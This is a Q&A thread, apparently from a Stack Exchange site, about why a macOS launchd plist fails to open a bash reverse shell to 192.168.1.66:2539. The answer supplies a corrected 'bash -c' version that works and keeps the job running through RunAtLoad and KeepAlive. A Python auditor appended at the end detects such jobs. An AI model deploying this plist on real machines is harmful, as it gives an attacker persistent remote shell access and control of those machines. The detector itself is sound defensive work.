Launchd File for reverse stream

0

Does anyone have any ideas why this fails to execute a reverse stream connection when loaded?

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
            <key>Label</key>
            <string>com.unix.bash.plist</string>
            <key>ProgramArguments</key>
            <array>
                    <string>/bin/bash</string>
                    <string>-i</string>
                    <string>&gt;&amp; /dev/tcp/192.168.1.66/2539 0&gt;&amp; 1</string>
            </array>
            <key>RunAtLoad</key>
            <true/>
            <key>StartInterval</key>
            <integer>100</integer>
            <key>KeepAlive</key>
            <true/>
    </dict>
    </plist>

November

Posted 2012-12-09T21:09:23.343

Reputation: 153

Answers

1

Redirections such as < or > (and in most Unixes, even the /dev/tcp special files) are part of the shell's command syntax, and can be used only inside a shell that supports them. However, launchd does not use any shell to start services – it creates the process directly using execve() or similar functions, passing a list of arguments that are not interpreted further.

In this case, /bin/bash is executed, and receives the following arguments:

  • argv[0] = "/bin/bash"
  • argv[1] = "-i"
  • argv[2] = ">& /dev/tcp/192.168.1.66/2539 0>& 1"
  • argv[3] = NULL

Bash interprets the second argument (argv[2]) as a file name of a shell script to run; since such a file doesn't exist, bash exits.


Now, if you need the command to be interpreted by a shell, you will have to run a shell manually:

    <key>ProgramArguments</key>
    <array>
            <string>/bin/bash</string>
            <string>-c</string>
            <string>bash -i &gt;&amp; /dev/tcp/192.168.1.66/2539 0&gt;&amp; 1</string>
    </array>

user1686

Posted 2012-12-09T21:09:23.343

Reputation: 283 655

So are you saying this can't work, or giving me a solution? – November – 2012-12-09T21:58:27.500

Thank you for answering my question. I know it's not on topic, but should this file now connect a shell back to 192.168.1.66 on 2539? – November – 2012-12-10T03:06:39.113
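A defender-side check built on the answer's point that launchd passes `ProgramArguments` to `execve()` without shell parsing. This is an added example, not part of the original question or answer: it reads a launchd property list with Python's `plistlib` and separates a `/dev/tcp` redirection that a shell will actually parse (the word after `-c`) from one that is only a literal argument. The function names, finding strings and sample jobs are constructed for illustration.

```python
import plistlib
import re
from pathlib import PurePosixPath

SHELLS = {"sh", "bash", "zsh", "ksh", "dash"}
# /dev/tcp and /dev/udp paths are handled by bash itself inside redirections.
NET_REDIRECT = re.compile(r"[<>]&?\s*/dev/(?:tcp|udp)/[^/\s]+/\d+")

def command_index(argv):
    """Index of the string a shell will parse (the word after -c), or None.

    Simplification: any single-dash option group containing 'c' (-c, -ic)
    is treated as the -c flag and the next argument as the command string.
    """
    if not argv or PurePosixPath(argv[0]).name not in SHELLS:
        return None
    for i, arg in enumerate(argv[1:], start=1):
        if arg.startswith("-") and not arg.startswith("--") and "c" in arg[1:]:
            return i + 1 if i + 1 < len(argv) else None
    return None

def audit_job(plist_bytes):
    """Return (argv, findings) for one launchd job definition."""
    job = plistlib.loads(plist_bytes)
    argv = [a for a in job.get("ProgramArguments", []) if isinstance(a, str)]
    idx = command_index(argv)
    findings = []
    if idx is not None and NET_REDIRECT.search(argv[idx]):
        # A shell parses this string, so the redirection really opens a socket.
        findings.append("shell -c command redirects to /dev/tcp or /dev/udp")
        if job.get("RunAtLoad") or job.get("KeepAlive"):
            findings.append("job is started automatically (RunAtLoad/KeepAlive)")
    for i, arg in enumerate(argv[1:], start=1):
        if i != idx and NET_REDIRECT.search(arg):
            # launchd hands this to execve() verbatim: no shell ever parses it.
            findings.append("redirection passed as a literal argument (inert)")
    return argv, findings

def sample_job(args):
    # Constructed test input; 192.0.2.10 is a documentation address.
    return plistlib.dumps({"Label": "com.example.job",
                           "ProgramArguments": args, "RunAtLoad": True})

# Constructed jobs mirroring the two ProgramArguments layouts discussed above.
LITERAL = sample_job(["/bin/bash", "-i", ">& /dev/tcp/192.0.2.10/9001 0>& 1"])
VIA_SHELL = sample_job(["/bin/bash", "-c",
                        "bash -i >& /dev/tcp/192.0.2.10/9001 0>& 1"])
```

Run `audit_job()` over the files in the LaunchAgents and LaunchDaemons directories; an "inert" finding still deserves review, since it shows what the job's author intended.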